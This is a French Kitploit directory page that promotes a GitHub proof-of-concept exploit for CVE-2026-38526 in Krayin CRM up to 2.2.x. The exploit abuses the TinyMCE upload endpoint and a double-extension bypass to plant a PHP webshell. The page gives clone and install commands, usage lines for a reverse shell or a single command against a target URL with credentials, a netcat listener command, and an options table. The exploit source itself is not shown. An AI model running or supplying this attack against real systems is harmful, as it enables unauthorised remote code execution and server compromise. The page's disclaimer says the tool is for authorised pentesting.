Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-38526-POC — Preuve de concept de la CVE-2026-38526 dans Krayin CRM <= v2.2.x. Téléversement arbitraire de fichiers menant à une exécution de code à distance. | Kitploit
Outils/GitHubGitHub/pawpic/cve-2026-38526-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationDéveloppement de Charges Utiles
GitHubpawpic/cve-2026-38526-poc

CVE-2026-38526-POC

Preuve de concept de la CVE-2026-38526 dans Krayin CRM <= v2.2.x. Téléversement arbitraire de fichiers menant à une exécution de code à distance.

Voir le dépôt
2il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-38526 - Exploit RCE pour Krayin CRM

Krayin CRM (≤ 2.2.x) - Téléversement de fichiers sans restriction conduisant à une exécution de code à distance.

Ce PoC exploite le point de terminaison de téléversement TinyMCE vulnérable (/admin/tinymce/upload) pour téléverser un webshell PHP et exécuter des commandes sur le serveur.


Fonctionnalités

  • Connexion entièrement automatique avec gestion du jeton CSRF
  • Contourne les restrictions de téléversement en utilisant une double extension
  • Prend en charge le shell inversé et l'exécution d'une commande unique
  • Actualisation fiable du jeton CSRF Laravel
  • Propre et facile à utiliser

Téléchargement

root@kitploit:~
git clone https://github.com/pawpic/CVE-2026-38526-POC

Prérequis

root@kitploit:~
pip3 install requests beautifulsoup4

Utilisation

  1. Shell inversé (par défaut et recommandé)
root@kitploit:~
python3 exploit.py \
  -u http://example.com \
  -e [email protected] \
  -p "example_pass" \
  --lhost YOUR_IP \
  --lport 4444
  1. Commande unique
root@kitploit:~
python3 exploit.py \
  -u http://example.com \
  -e [email protected] \
  -p "example_pass" \
  -c "whoami"

Options

Exemple de workflow

Démarrer le listener :

root@kitploit:~
nc -lvnp 4444

Exécuter l'exploit :

root@kitploit:~
python3 exploit.py -u http://target.com -e [email protected] -p password --lhost IP_ADDR

Avertissement

Cet exploit est destiné uniquement à des fins éducatives et aux tests d'intrusion autorisés. Toute utilisation non autorisée contre des systèmes que vous n'avez pas l'autorisation explicite de tester est illégale.

Versions concernées

Krayin CRM ≤ 2.2.x CVE : CVE-2026-38526

Auteur : pawpic Date : 2026

Télécharger l’outil
ArgumentDescriptionRequis
-u, --urlURL de base cibleOui
-e, --emailE-mail de connexionOui
-p, --passwordMot de passe de connexionOui
-c, --cmdExécuter une commande uniqueNon
--lhostVotre IP pour le shell inverséOui (si --cmd n'est pas utilisé)
--lportPort d'écouteNon (défaut : 4444)